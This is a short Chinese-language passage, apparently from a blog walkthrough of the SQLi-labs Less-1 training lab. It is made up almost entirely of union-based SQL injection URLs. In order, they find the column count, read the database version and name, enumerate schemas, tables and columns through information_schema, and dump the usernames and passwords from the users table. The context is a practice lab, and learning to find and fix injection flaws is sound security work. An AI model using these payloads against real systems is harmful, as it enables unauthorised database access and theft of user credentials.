http://127.0.0.1/sql/Less-1/?id=1‘20union select null,null,null%20--+,如图当 null 的个数为3后数值显示正常了。
http://127.0.0.1/sql/Less-1/?id=1‘ order by 4--+ 也可以判断。
http://www.sqli-lab.cn/Less-1/?id=1‘ and 1=2 union select 1,version(),database() --+
http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘)--+
http://127.0.0.1/sql/Less-1/?id=1‘ AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘) --+
?id=1‘ AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
原文:https://www.cnblogs.com/daomiao/p/15125900.html